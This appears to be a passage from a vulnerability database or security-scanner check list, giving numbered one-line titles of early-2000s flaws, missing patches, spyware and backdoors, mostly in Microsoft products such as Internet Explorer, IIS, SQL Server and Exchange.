Microsoft Knowledge Base Article 867282 is not installed [19137] Microsoft Internet Explorer Channel Definition Format code execution [19133] Microsoft DHTML method buffer overflow [19121] Microsoft Pocket Internet Explorer (PIE) URL Unicode spoofing [19118] Microsoft Knowledge Base Article 890047 is not installed [19117] Microsoft Internet Explorer drag and drop event file downloading [19116] Microsoft Knowledge Base Article 891781 is not installed [19112] Microsoft Knowledge Base Article 873352 is not installed [19111] Microsoft Knowledge Base Article 888113 is not installed [19107] Microsoft Office XP URL buffer overflow [19106] Microsoft Knowledge Base Article 873333 is not installed [19102] Microsoft Knowledge Base Article 885834 is not installed [19095] Microsoft Knowledge Base Article 888302 is not installed [19092] Microsoft Knowledge Base Article 887981 is not installed [19090] Microsoft Knowledge Base Article 885250 is not installed [18944] Microsoft Knowledge Base Article 886185 is not installed [18936] Microsoft Internet Explorer file exisitence [18897] Microsoft Internet Explorer bypass file download warning [18770] Microsoft Knowledge Base Article 890175 is not installed [18769] Microsoft Knowledge Base Article 887219 is not installed [18723] Microsoft Internet Explorer FTP arbitrary file creation [18504] Microsoft Internet Explorer DHTML bypass cross-domain security model [18489] Cisco Unity integrated with Microsoft Exchange has default user accounts [18444] Microsoft Internet Explorer could allow an attaker to bypass popup blocking [18442] Microsoft SharePoint Portal Server could allow an attacker to obtain password [18395] Microsoft Internet Explorer sysimage obtain information [18389] Microsoft Exchange Server SMTP buffer overflow [18388] Microsoft Exchange Server SMTP integer overflow [18311] Microsoft Internet Explorer save file caused by the Related Topics command of the Help ActiveX Control [18269] Microsoft Internet Explorer Save Picture As spoofing [18189] Altiris Deployment Agent for Windows allows elevated privileges [18181] Microsoft Internet Explorer execCommand bypass download warnings [18073] Microsoft Internet Explorer path cookie overwrite [18020] Microsoft Internet Explorer status bar spoofing [17989] Microsoft Internet Explorer open window allows attacker to obtain information [17938] Microsoft Internet Explorer A HREF status bar spoofing [17936] Cisco Secure ACS for Windows and Solution Engine EAP-TLS bypass authentication [17931] Microsoft Internet Explorer mshtml.dll denial of service [17911] Microsoft Internet Explorer FONT tags denial of service [17910] Microsoft Internet Explorer Hhctrl.ocx allows cross-domain script injection [17909] Microsoft Internet Explorer table status bar spoofing [17907] Microsoft ISA Server and Proxy Server Patch MS04-039 is not installed [17906] Microsoft ISA Server and Proxy Server allow Web site spoofing caused by cache reverse lookup results [17889] Microsoft Internet Explorer IFRAME SRC NAME buffer overflow [17868] Microsoft Remote Desktop Tsshutdn command restart [17828] Microsoft Outlook base64 image file bypass security [17826] Microsoft Outlook 2003 CID security bypass [17824] Microsoft Internet Explorer AnchorClick command execution [17820] Microsoft Internet Explorer bypass Drag and Drop or copy and paste files security setting [17746] Microsoft Internet Explorer URL address spoofing [17739] Microsoft FrontPage and Internet Explorer asycpict.dll JPEG denial of service [17683] Microsoft Excel MS04-033 patch is not installed [17656] Microsoft Internet Information Server MS04-030 patch is not installed [17655] Microsoft Internet Explorer plug-in navigation allows address bar spoofing [17654] Microsoft Internet Explorer cache from SSL Web sites obtain information [17653] Microsoft Excel allows code execution [17652] Microsoft Internet Explorer Double Byte Character Set spoof Web site to obtain information [17651] Microsoft Internet Explorer MS04-038 patch is not installed [17650] Microsoft Internet Explorer allows unauthorized access to XML documents [17645] Microsoft Internet Information Server WebDAV multiple attributes per XML elements cause denial of service [17644] Microsoft ASP.NET Framework bypass security [17635] Microsoft Word improper file parsing buffer overflow [17620] Microsoft Internet Explorer InstallEngineCtl SetCifFile buffer overflow [17542] Microsoft SQL Server data buffer denial of service [17479] Windows Mite backdoor [17408] MyWaySpeedBar attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass security software [17407] DealHelper attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass security software [17402] zSearch attaches to processes of Microsoft Internet Explorer [17395] AdButler spyware attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass security software [17340] Microsoft Word Perfect MS04-027 patch is not installed [17306] Microsoft WordPerfect converter long message buffer overflow [17153] Microsoft System Information (Msinfo32.exe) msinfo_file buffer overflow [17118] Cisco Secure ACS Windows and Solution Engine CSAdmin bypass authentication [17116] Cisco Secure ACS Windows and Solution Engine LEAP RADIUS denial of service [17115] Cisco Secure ACS Windows and Solution Engine CSAdmin HTTP denial of service [17114] Cisco Secure ACS Windows and Solution Engine CSAdmin TCP denial of service [17102] Microsoft Internet Explorer IFRAME information disclosure [17098] Microsoft Outlook Express address information disclosure [17048] Microsoft ISA Server FTP bounce attack [17044] Microsoft Internet Explorer dragDrop allows code execution [17007] Microsoft Internet Explorer address bar spoofing [16872] Microsoft Internet Information Server (IIS) ActivePerl command execution [16857] Microsoft Internet Explorer STYLE tag comment buffer overflow [16805] Microsoft Internet Explorer MS04-025 patch is not installed [16804] Microsoft Internet Explorer MSHTML.DLL GIF file buffer overflow [16709] Microsoft Internet Explorer JavaScript denial of service [16708] Microsoft Outlook Express code execution [16707] Suspicious or malicious windows registry keys and values exist [16696] Microsoft Systems Management Server (SMS) Remote Control Client service denial of service [16692] PHP HTML tags may bypass strip_tag function in Microsoft Internet Explorer and Safari [16681] Microsoft Internet Explorer function redirect cross-site scripting [16678] Microsoft Internet Explorer text file denial of service [16675] Microsoft Internet Explorer popup.show allows attacker to perform actions [16666] Microsoft Java Virtual Machine sandbox restriction bypass [16663] Microsoft Word and Outlook Object tag allows unauthorized access [16656] Microsoft Internet Information Server (IIS) MS04-021 patch is not installed [16648] Microsoft Internet Explorer Shell.Application [16624] Microsoft Internet Explorer ADODB.Stream object is not disabled [16585] Microsoft Outlook Express malformed email header denial of service [16583] Microsoft Exchange Server OWA could allow remote execution of code [16578] Microsoft Internet Information Server (IIS) redirect buffer overflow [16448] Microsoft MN-500 Web administration denial of service [16443] Microsoft Internet Explorer Wildcard DNS entry cross-site scripting [16420] Microsoft Internet Explorer null pointer denial of service [16398] Microsoft Internet Explorer bypass security zone restrictions [16394] Microsoft Internet Explorer ADODB.Stream object code execution [16384] Microsoft ISA Server Web Proxy redirect denial of service [16383] Microsoft ISA Server Basic authentication credentials sent in plain text [16382] Microsoft ISA Server canonicalization error in Rules engine [16380] Microsoft ISA Server Web Proxy SSL denial of service [16361] Microsoft Internet Explorer bypass cross-zone restrictions [16348] Microsoft Internet Explorer Location: header bypass restrictions [16306] Microsoft DirectX DirectPlay denial of service [16205] Microsoft SQL Server buffer overflow exploit attempt detected [16202] Microsoft Internet Explorer buffer overflow exploit attempt detected [16201] Microsoft Internet Information Services buffer overflow exploit attempt detected [16200] Microsoft Exchange Server buffer overflow exploit attempt detected [16189] Microsoft Internet Explorer CSS denial of service [16181] Microsoft Visual Basic Command1_Click buffer overflow [16173] Microsoft Outlook 2003 OLE object bypass restricted security zone [16168] Microsoft Outlook Express SMTP usernames and passwords disclosure [16161] Microsoft Internet Explorer browser URL spoofing [16160] Microsoft Internet Explorer MSHTM.DLL http-equiv META tag denial of service [16147] Microsoft Internet Explorer showHelp CHM file execution [16119] Microsoft Outlook 2000 URL spoofing [16116] Microsoft Outlook VML information disclosure [16104] Microsoft Outlook 2003 predictable file location could allow code execution [16102] Microsoft Internet Explorer and Outlook Express A HREF URL spoofing [16091] Microsoft Internet Explorer file URL could allow an attacker to overwrite registry [16061] Microsoft Internet Explorer SSL certificate spoofing [16058] Microsoft Internet Information Server ASP information disclosure [15906] Microsoft Visual Studio .NET unknown Debugger configuration issue [15859] Microsoft Outlook email ASCII NUL denial of service [15853] Microsoft Internet Explorer OLE object unauthorized print job [15832] Microsoft Internet Explorer IFRAME denial of service [15809] Microsoft Outlook Express MS04-013 patch is not installed [15729] Microsoft SharePoint Portal Server cross-site scripting [15705] Microsoft Outlook Express MHTML URL allows execution of code [15703] Microsoft Jet Database Engine query could execute code [15698] Microsoft Internet Explorer and Outlook Express URL FORM spoofing [15591] Microsoft Visual Studio and Microsoft Visual C++ denial of service [15544] Microsoft Internet Explorer shell: command denial of service [15521] MSN (Microsoft Network) Messenger file transfer [15429] Microsoft Outlook MS04-009 patch is not installed [15427] Microsoft Network Messenger MS04-010 patch is not installed [15414] Microsoft Outlook 2002 mailto URL allows execution of code [15337] Microsoft Internet Explorer cross-frame domain restrictions bypass [15326] Microsoft Internet Explorer Perfect Nav plugin denial of service [15210] Microsoft Internet Explorer BMP bitmap image file integer overflow [15127] Microsoft Internet Explorer and Outlook null character in host name denial of service [15113] Microsoft Virtual PC for Mac allows elevated privileges [15078] Microsoft Internet Explorer vb script reports different errors to obtain information [15006] Microsoft Internet Explorer MS04-004 patch is not installed [14964] Microsoft Internet Explorer file extension spoofing [14845] Microsoft Convert.exe converts FAT32 to NTFS files systems insecurely [14609] ZyncosMark attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass security software [14601] WurldMedia attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass security software [14594] WinLocator BHO attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass security software [14561] spyware VX2.BetterInternet attaches to processes of Microsoft Internet Explorer to obtain information [14560] VX2.BC777(SiteHlprBHO) attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass security software [14537] TopSearch attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass security software [14529] Thesten attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass security software [14522] Surfairy attaches to processes of Microsoft Internet Explorer and opens advertisements [14504] ShopNav Hijacker attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass security software [14494] SearchWWW attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass security software [14426] NavExcel attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass software [14425] MyWebSearch Toolbar attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass software [14424] MyFastAccess Toolbar attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass software [14422] MSMediaservice attaches to processes of Microsoft Internet Explorer and could allow an attacker to execute code [14421] MSIEbho-Stub BHO attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass software [14418] MPGCom Toolbar attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass software [14400] Kontiki attaches to processes of Microsoft Internet Explorerand acts as part of the Web browser to bypass software [14396] JAJsoft.CSRS attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass software [14395] iWon attaches to processes of Microsoft Internet Explorer and could allow a remote attacker to execute code [14390] IPInsight attaches to processes of Microsoft Internet Explorer and could allow an attacker to execute code [14389] Invictus MediaUpdate attaches to processes of Microsoft Internet Explorer and could allow an attacker to execute code [14383] IETop100 attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass software [14380] IDGsearch spyware attaches to processes of Microsoft Internet Explorer and could allow execution of code [14378] IBIS Toolbar attaches to processes of Microsoft Internet Explorer to obtain information [14374] Httper attaches to processes of Microsoft Internet Explorer and allows execution of code [14348] Friend Toolbar attaches to processes of Microsoft Internet Explorer [14342] FindSex attaches to processes of Microsoft Internet Explorer and allows disclosure of information [14340] FavoriteMan attaches to processes of Microsoft Internet Explorer and may allow execution of code [14325] emes-x bho attaches to processes of Microsoft Internet Explorer and may allow execution of code [14316] e2Give attaches to processes of Microsoft Internet Explorer and obtains information [14314] DyFuCA attaches to processes of Microsoft Internet Explorer and obtains information [14256] BDSearch Plugin attaches to processes of Microsoft Internet Explorer and may replace the home page [14252] AutoSearchBHO attaches to processes of Microsoft Internet Explorer [14243] Alexa spyware attaches to processes of Microsoft Internet Explorer [14237] Microsoft URLScan Web server information disclosure [14188] HD Soft Windows FTP Server format string [14187] Microsoft Data Access Components (MDAC) broadcast request buffer overflow [14179] Microsoft Data Access Components (MDAC) MS04-003 patch is not installed [14178] Microsoft ISA Exchange Server 2003 MS04-002 patch is not installed [14177] Microsoft ISA MS04-001 patch is not installed [14167] Microsoft ISA Server 2000 H.323 filter buffer overflow [14137] GoodTech Telnet Server for Windows NT/2000/XP long string denial of service [14130] Microsoft Excel could allow an attacker to bypass the &quot [14129] Microsoft Word, Excel, and PowerPoint could allow an attacker to bypass the &quot [14128] Microsoft Word could allow an attacker to bypass &quot [14127] Microsoft Internet Explorer .lnk shortcuts could allow code execution [14105] Microsoft Internet Explorer showHelp directory traversal [14100] Windows Telnet Server username buffer overflow [14092] Microsoft Internet Explorer &quot [14077] Microsoft Internet Information Server (IIS) fails to properly log HTTP TRACK requests [13975] Microsoft Internet Explorer cache attack allows code execution [13960] FlashGet stores user passwords in plain text in Windows registry [13935] Microsoft Internet Explorer domain URL spoofing [13869] Microsoft Exchange Server OWA could allow unauthorized email account access [13847] Microsoft Internet Explorer download function cache directory disclosure [13846] Microsoft Internet Explorer subframe cross-site scripting [13845] Microsoft Internet Explorer mhtml: URL handler bypass check [13844] Microsoft Internet Explorer method caching perform actions [13809] Microsoft Internet Explorer scrollbar-base-color attribute denial of service [13795] Microsoft SharePoint settings.htm authentication bypass [13779] Microsoft Internet Explorer HTML injection [13682] Microsoft Word macro buffer overflow allows execution of code [13681] Microsoft Excel macro allows attacker to execute code [13680] Microsoft FrontPage Server Extensions SmartHTML Interpreter denial of service [13679] Microsoft Internet Explorer drag and drop could allow an attacker to save file to local system [13678] Microsoft Internet Explorer XML object could allow an attacker to obtain information [13677] Microsoft Internet Explorer script URLs zone bypass [13676] Microsoft Internet Explorer function pointer override zone bypass [13675] Microsoft Internet Explorer ExecCommand zone bypass [13674] Microsoft FrontPage Server Extensions debug buffer overflow [13652] Microsoft Data Access Components GET request [13617] Microsoft Internet Explorer clientCaps behavior could disclose sensitive information [13588] Microsoft Internet Explorer IFRAME tag could allow an attacker to execute files [13501] Microsoft Internet Explorer position: absolute denial of service [13500] Microsoft Word malformed document [13453] Microsoft Internet Information Server 404 error message determines service pack level [13433] Microsoft Exchange SMTP extended verb request denial of service [13432] Microsoft Exchange SMTP extended verb request buffer overflow [13421] Microsoft Exchange Server OWA Compose New Message form cross-site scripting [13403] HP OpenView Operations for Windows remote action [13376] Microsoft Internet Explorer Dynamic HTML behaviors allows an attacker to execute code [13314] Microsoft Internet Explorer popup window containing Object Data tags could allow an attacker to execute code [13300] Microsoft Internet Explorer XML Web page containing Object Data tags could allow an attacker to execute code [13285] Microsoft PowerPoint data manipulation [13242] Microsoft BizTalk Server insecure permissions in BizTalkServerDocs and BizTalkServerRespository directories allow file upload [13207] TM-POP3 Server stores user passwords in plain text in Windows registry [13176] Microsoft Internet Explorer media sidebar could allow an attacker to execute code [13166] Microsoft Internet Explorer history.back function allows attacker to obtain information from a site loaded in a different frame and domain [13165] Microsoft Internet Explorer NavigateAndFind function allows an attacker to obtain information and execute code [13163] Microsoft Internet Explorer window.open function allows an attacker to obtain information and execute code [13162] Microsoft Internet Explorer history.back function allows an attacker to obtain information and execute code [13161] Microsoft Internet Explorer allows an attacker to obtain cookies by opening Web site in _search window [13126] Microsoft ASP.NET could allow an attacker to bypass Request Validation feature [13116] Microsoft IIS MS03-018 patch is not installed on the system [13093] Microsoft Access Snapshot Viewer buffer overflow [13091] Microsoft Office WordPerfect converter buffer overflow [13090] Microsoft Word could allow an attacker to bypass Macro Security Model [13088] Microsoft IIS running RealSecure Server Sensor ISAPI plug-in denial of service [13029] Microsoft Internet Explorer input type tag denial of service [12970] Microsoft Internet Explorer DBCS Type property of Object tag buffer overflow [12962] Microsoft Internet Explorer BR549.DLL ActiveX control buffer overflow [12961] Microsoft Internet Explorer browser cache script injection [12960] Microsoft Internet Explorer Object Data tags could allow an attacker to execute code [12959] Microsoft Data Access Components broadcast request buffer overflow [12914] Microsoft Internet Explorer about:blank page cross-site scripting [12910] Microsoft Visual Studio MCWNDX ActiveX buffer overflow [12872] Microsoft NetMeeting malformed packet denial of service [12783] Microsoft Internet Information Server ASP engine could allow an attacker to upload malicious files [12704] Microsoft SQL Server named pipe hijack [12703] Microsoft SQL Server LPC buffer overflow [12702] Microsoft DirectX MIDI buffer overflows [12700] Microsoft SQL Server named pipe denial of service [12687] Microsoft IIS Remote Administration Tool allows attacker to reset administrative password [12686] Microsoft IIS Remote Administration Tool could allow an attacker to obtain valid session IDs [12684] Microsoft Exchange Server OWA Outlook 2003 denial of service [12627] Microsoft ISA homepage function error page cross-site scripting [12590] Microsoft Internet Explorer window.external.AutoScan function cross-site scripting [12538] Microsoft Internet Explorer C:\aux URL denial of service [12532] Microsoft Exchange OWA REFERER header cross-site scripting [12531] Microsoft Exchange OWA could allow an attacker to execute code [12530] Microsoft SQL Server CreateFile API function allows attacker to gain privileges [12512] IglooFTP PRO for Windows FTP banner, Username, Password, and Account functions buffer overflow [12490] Microsoft NetMeeting &quot [12444] Microsoft Internet Explorer HTML conversion library buffer overflow [12336] Microsoft Internet Explorer Homepage function could allow command execution [12334] Microsoft Internet Explorer MSXML cross-site scripting [12249] Microsoft Internet Explorer FTP implementation &quot [12193] Microsoft Internet Explorer &quot [12184] Microsoft Internet Explorer Type property of Object tag buffer overflow [12137] Microsoft Internet Explorer URL spoofing [12100] Microsoft IIS long WebDAV requests containing XML denial of service [12099] Microsoft IIS Response.AddHeader denial of service [12098] Microsoft IIS Server-Side Include (SSI) long file name buffer overflow [12097] Microsoft IIS redirect error cross-site scripting [12089] Microsoft SQL Server Jet OLE DB Provider is enabled [12043] Microsoft Internet Explorer Script Engine denial of service [12019] Microsoft Internet Explorer FRAME or IFRAME bypass restrictions [11946] Microsoft Internet Explorer anchorClick behavior denial of service [11918] Microsoft IIS authentication mechanism could allow an attacker to determine valid user account names [11901] Microsoft BizTalk Server 2002 SQL injection [11900] Microsoft BizTalk Server 2002 HTTP Receiver function buffer overflow [11873] Microsoft Internet Explorer, Outlook, and FrontPage shlwapi.dll library denial of service [11854] Microsoft Internet Explorer plug-in.ocx Load method buffer overflow [11849] Microsoft Internet Explorer Modal Dialog could allow an attacker to read files [11848] Microsoft Internet Explorer improper rendering of third party file types could allow code execution [11847] Microsoft Internet Explorer File Upload control allows attacker to obtain information [11846] Microsoft Internet Explorer URLMON.DLL library buffer overflow [11805] Microsoft Internet Explorer OBJECT tag denial of service [11776] Microsoft Active Directory insecure permissions on SYSTEM-account [11752] Microsoft ISA and Proxy Server Firewall and Winsock Proxy service denial of service [11751] Microsoft VM ByteCode Verifier improper validation of code [11589] Microsoft ActiveSync &quot [11576] Microsoft ISA DNS intrusion detection application filter denial of service [11537] Microsoft IIS WebDAV service is running on the system [11533] Microsoft IIS WebDAV long request buffer overflow [11507] Microsoft Internet Explorer .mht buffer overflow [11466] Microsoft Internet Explorer embedded HTML EXE file execution [11430] Microsoft Locator service is running on the system [11411] Microsoft Outlook CODEBASE value allows remote program execution [11264] Microsoft Internet Explorer MS03-004 patch is not installed on the system [11259] Microsoft Internet Explorer showHelp() zone bypass [11258] Microsoft Internet Explorer dialog box zone bypass [11250] Microsoft Internet Explorer dragDrop() method could be used to read local files [11133] Microsoft Outlook 2002 using V1 Exchange Server Security certificates transmits plaintext emails [10945] Microsoft Internet Explorer multimedia file URL cross-site scripting [10943] Gallery Windows XP Publishing feature could be used to execute commands [10883] Microsoft Internet Explorer Browser Helper Object (BHO) could disclose information [10833] Microsoft VM JDBC APIs could allow unauthorized database access [10822] Microsoft Word and Excel stores ODBC passwords and usernames in plain text [10809] Microsoft Internet Explorer MS02-068 patch is not installed on the system [10798] Microsoft Internet Explorer dialog window style parameter can access a user`s local security zone [10763] Microsoft Outlook malformed email header denial of service [10760] Microsoft RDS has been enabled on the system [10732] Sun Solaris OpenWindows mailtool(1) denial of service [10723] SSH Windows client URL buffer overflow [10674] Microsoft Internet Explorer IFRAME dialogArguments object can access a user`s local security zone [10670] Microsoft Data Access Components (MDAC) MS02-065 patch is not installed [10669] Microsoft Data Access Components RDS Data Stub client heap buffer overflow [10665] Microsoft Internet Explorer OBJECT tag could be used to read TIF folder name [10662] Microsoft Internet Explorer PNG inflate_fast() buffer overflow [10659] Microsoft Data Access Components RDS Data Stub server heap buffer overflow [10590] Microsoft Internet Information Server (IIS) MS02-062 patch [10588] Microsoft VM HTML Applet tag denial of service [10587] Microsoft VM passed HTML object denial of service [10586] Microsoft VM CabCracker class could allow an attacker to load .cab archives [10585] Microsoft VM StandardSecurityManager class restriction bypass [10584] Microsoft VM Java Applet codebase tag could be used to read files [10583] Microsoft VM INativeServices could be used to access clipboard contents [10582] Microsoft VM INativeServices could allow unauthorized memory access [10581] Microsoft VM Java Applet could disclose path to current directory [10580] Microsoft VM Java Applet class loader buffer overflow [10579] Microsoft VM URL redirect cross-domain Java Applet execution [10542] Microsoft SQL Server login accounts use weak encryption algorithm [10535] EventSave and EventSave+ could allow event loss from the Windows NT log [10504] Microsoft IIS script source access could be bypassed to upload .COM files [10503] Microsoft IIS WebDAV memory allocation denial of service [10502] Microsoft IIS out-of-process applications could be used to gain elevated privileges [10501] Microsoft IIS administrative Web pages cross-site scripting [10500] Microsoft Outlook Express fails to delete messages from dbx files [10459] Microsoft Internet Explorer could allow an attacker to bypass cookie restrictions [10443] Microsoft Internet Explorer saved &quot [10440] Microsoft Internet Explorer clipboardData cached object DOM access [10439] Microsoft Internet Explorer execCommand cached object DOM access [10438] Microsoft Internet Explorer getElementsByTagName cached object DOM access [10437] Microsoft Internet Explorer getElementsByName cached object DOM access [10436] Microsoft Internet Explorer getElementById cached object DOM access [10435] Microsoft Internet Explorer elementFromPoint cached object DOM access [10434] Microsoft Internet Explorer createRange cached object DOM access [10433] Microsoft Internet Explorer external cached object DOM access [10432] Microsoft Internet Explorer showModalDialog cached object DOM access [10388] Microsoft SQL Server Web tasks could allow elevated privileges [10371] Microsoft Internet Explorer oIFrameElement.Document cross-domain script execution [10370] Microsoft IIS HTTP HOST header denial of service [10342] Microsoft TSAC ActiveX connect.asp cross-site scripting [10338] Microsoft Outlook Express S/MIME certificate buffer overflow [10318] Microsoft Content Management Server (MCMS) ManualLogin.asp REASONTXT cross-site scripting [10294] Microsoft IIS .idc extension error message cross-site scripting [10290] Microsoft Internet Explorer saved &quot [10259] Microsoft Services for Unix (SFU) invalid RPC packet denial of service [10258] Microsoft Services for Unix (SFU) RPC parameter size buffer overflow could crash the server [10257] Microsoft SQL Server Agent scheduled jobs could create malicious output files [10255] Microsoft SQL Server Database Consistency Checker (DBCC) buffer overflow [10195] Microsoft FrontPage Server Extensions (FPSE) 2002 SmartHTML Interpreter buffer overflow [10194] Microsoft FrontPage Server Extensions (FPSE) 2000 SmartHTML Interpreter denial of service [10186] Microsoft Active Data Objects (ADO) buffer overflow [10184] Microsoft IIS 5.0 resource utilization denial of service [10180] Microsoft Internet Explorer fails to report an expired SSL CA certificate [10179] Microsoft Virtual Machine (VM) JDBC class allows access to ODBC data sources [10158] Microsoft Internet Explorer HTTP redirect bypass restrictions [10155] Microsoft Word INCLUDEPICTURE field in shared documents can be used to read other files [10135] Microsoft Virtual Machine (VM) XML methods can be accessed [10134] Microsoft Virtual Machine (VM) JDBC handle validation could crash Internet Explorer [10133] Microsoft Virtual Machine (VM) JDBC classes can execute local DLLs [10119] Microsoft NetMeeting RDS local session hijacking [10117] Microsoft Internet Explorer FTP URL denial of service [10067] Microsoft Outlook Express &quot [10066] Microsoft Internet Explorer frame/iframe javascript: URL cross-domain script execution [10044] Cisco VPN Client Windows utility program could decipher the group password [10039] Microsoft Internet Explorer URL encoded forward-slash &quot [10035] Microsoft Visual FoxPro could allow an attacker to execute an application [10033] Microsoft Outlook Express S/MIME spoofed CA certificate man-in-the-middle attack [10031] Microsoft SQL Server Resolution Service stack buffer overflow [10021] Cisco VPN 3000 series concentrators Windows PPTP client denial of service [10012] Microsoft SQL Server sp_MSSetServerProperties and sp_MSsetalertinfo stored procedures allow &quot [10008] Microsoft Word INCLUDETEXT field in shared documents can be used to read other files [9938] Microsoft Internet Explorer &quot [9937] Microsoft Internet Explorer file download origin spoofing [9936] Microsoft Internet Explorer XML redirect could be used to read files [9935] Microsoft Legacy Text Formatting ActiveX control buffer overflow [9934] Microsoft TSAC ActiveX control buffer overflow [9931] Microsoft Office Web Components MS02-044 patch is not installed on the system [9909] MySQL logging disabled by default on Windows [9907] Microsoft FTM ActiveX control could be used by an attacker to upload and download files [9906] Microsoft FTM ActiveX control &quot [9893] Microsoft SQL Server Agent jobs could be used to create and overwrite files [9886] Microsoft Internet Explorer Java logging could be used to execute code [9885] Microsoft Internet Explorer XML Datasource applet could be used to read local files [9883] Microsoft Internet Explorer Google Toolbar search request denial of service [9881] Microsoft Internet Explorer &quot [9877] Microsoft DirectX Files Viewer control buffer overflow [9857] Microsoft SQL Server XPs with weak permissions could allow elevated privileges [9848] Microsoft Internet Explorer HTM script execution [9791] Microsoft Exchange IIS license exhaustion denial of service [9789] Microsoft Exchange MSRPC denial of service [9788] Microsoft SQL Server pre-authentication buffer overflow [9785] Microsoft Content Management Server (MCMS) resource request SQL injection [9784] Microsoft Content Management Server (MCMS) Web authoring file execution [9783] Microsoft Content Management Server (MCMS) authentication buffer overflow [9734] Microsoft SQL Server MDAC OpenRowSet buffer overflow [9732] Microsoft Office Web Components (OWC) could allow a remote attacker to execute code [9724] Microsoft Outlook Express could allow the execution of XML files within the Temporary Internet File (TIF) directory [9667] Microsoft SQL Server MS02-038 patch [9666] Microsoft SQL Server MS02-039 patch [9662] Microsoft SQL Server Resolution Service keep-alive function denial of service [9661] Microsoft SQL Server Resolution Service heap buffer overflow [9660] Microsoft SQL Server replication stored procedures are vulnerable to SQL Injection [9659] Microsoft SQL Server Database Consistency Checker (DBCC) utilities have multiple buffer overflows [9658] Microsoft Exchange Server Internet Mail Connector (IMC) EHLO buffer overflow [9657] Microsoft Metadirectory Services (MMS) could allow unauthorized access to the data repository [9653] Microsoft Internet Explorer CTRL key could be used to upload files [9643] Microsoft Outlook Express malformed MIME headers could allow file type, size, and icon spoofing [9617] Microsoft Internet Explorer JavaScript page transitions denial of service [9580] Microsoft IIS SMTP service encapsulated addresses could allow mail relaying [9537] Microsoft Internet Explorer WebBrowser control OBJECT property could allow cross domain scripting [9531] Microsoft Internet Explorer CLASSID denial of service [9529] Microsoft Foundation Class Library ISAPI Buffer Overflow [9525] Microsoft Outlook PGP plug-in heap buffer overflow could allow remote code execution [9524] Microsoft SQL Server could store some passwords insecurely [9523] Microsoft SQL Server service account insecure registry permissions [9522] Microsoft SQL Server bulk data insert buffer overflow [9426] Microsoft Commerce Server new variant of AuthFilter ISAPI filter buffer overflow [9425] Microsoft Commerce Server OWC package installer folder permissions could allow remote command execution [9424] Microsoft Commerce Server OWC package installer buffer overflow [9423] Microsoft Commerce Server Profile Service API buffer overflow [9399] Microsoft Excel XSL Stylesheet allows attacker to execute script code [9398] Microsoft Excel allows macro execution if opened using hyperlink with drawing shape object [9397] Microsoft Excel execute inline macros [9367] Microsoft Internet Explorer Cascading Style-Sheet (CSS) bold font denial of service [9362] Microsoft Visual Studio .NET (Korean version) includes a Nimda-infected file [9346] Log Explorer for Microsoft SQL Server xp_logattach buffer overflow [9345] Microsoft SQL Server pwdencrypt() buffer overflow [9329] Microsoft SQL Server SQLXML XML tag script injection [9328] Microsoft SQL Server SQLXML ISAPI buffer overflow [9327] Microsoft IIS ISAPI HTR chunked encoding heap buffer overflow [9326] Microsoft RAS phonebook local buffer overflow [9290] Microsoft Internet Explorer FTP server name cross-site scripting [9276] Microsoft ASP.NET StateServer buffer overflow [9247] Microsoft Internet Explorer Gopher client malformed reply buffer overflow [9195] Microsoft Exchange message attribute denial of service [9187] Microsoft Passport SDK 2.1 Component Configuration Document (CCD) permission [9159] Microsoft Active Directory zero page length denial of service [9154] Microsoft Data Engine (MSDE) and Microsoft SQL Server 2000 Desktop Engine have a default blank &quot [9146] Microsoft Passport SDK 2.1 events reporting disabled [9123] Microsoft IIS 5.0 Log Files Directory Permission Exposure [9122] Microsoft Internet Explorer JavaScript self.location refresh denial of service [9121] Microsoft Internet Explorer for Unix could cause the CDE or X Server to crash when scrolling Chinese characters [9101] Microsoft Internet Explorer cookies with embedded script could be used to access other cookies on the local system [9094] Microsoft Passport Manager PASSPORTLOG.LOG exposure [9091] Microsoft Passport Manager verbose mode exposure [9090] Microsoft Internet Explorer MS02-023 patch is not installed on the system [9089] Microsoft Internet Explorer and Outlook Express BGSOUND tag could allow an attacker to obtain sensitive information [9088] Microsoft Internet Explorer and Outlook Express IFRAME tag could allow attacker to send data to a DOS device [9087] Microsoft Internet Explorer and Outlook Express BGSOUND DOS device reference could cause a denial of service [9086] Microsoft Internet Explorer &quot [9085] Microsoft Internet Explorer &quot [9084] Microsoft Internet Explorer NetBIOS connection could allow rendering of Web sites with incorrect security zone [9081] InfraTrojan backdoor allows remote access to Windows [9077] Microsoft Word Mail Merge variant could allow an attacker to execute arbitrary commands [9068] Microsoft Passport SDK 2.1 registry default permission exposure [9067] Microsoft Passport SDK 2.1 default test site exposure [9066] Microsoft Passport SDK 2.1 Adventure Works Sample Site exposure [9065] Microsoft Passport SDK 2.1 Adventure Works Sample Site global.asa file default permission exposure [9064] Microsoft Passport SDK 2.1 default time window exposure [9022] Intruzzo backdoor allows remote access to Windows computers [8974] Cisco VPN Client insecure installation on Windows XP [8969] Microsoft Internet Explorer and Outlook Express malformed XBM file denial of service [8947] Microsoft Baseline Security Analyzer creates a plaintext security report file [8941] Microsoft Internet Explorer JavaScript recursive onError event denial of service [8926] Microsoft Outlook Express POP3 message containing two &quot [8917] Storing of credentials or .NET passports for network authentication is allowed in Windows XP [8904] Microsoft Internet Explorer self-referenced OBJECT directive denial of service [8887] Digital encryption of secure data is not enabled in Windows XP [8886] Anonymous enumeration of SAM accounts is enabled in Windows XP [8885] Digital encryption or signing of secure data is disabled in Windows XP [8868] Microsoft Internet Explorer dialog window cross-site scripting [8862] Microsoft BackOffice Server allows attacker to bypass authentication for Web administration pages [8853] Microsoft IIS CodeBrws.asp sample script can be used to view 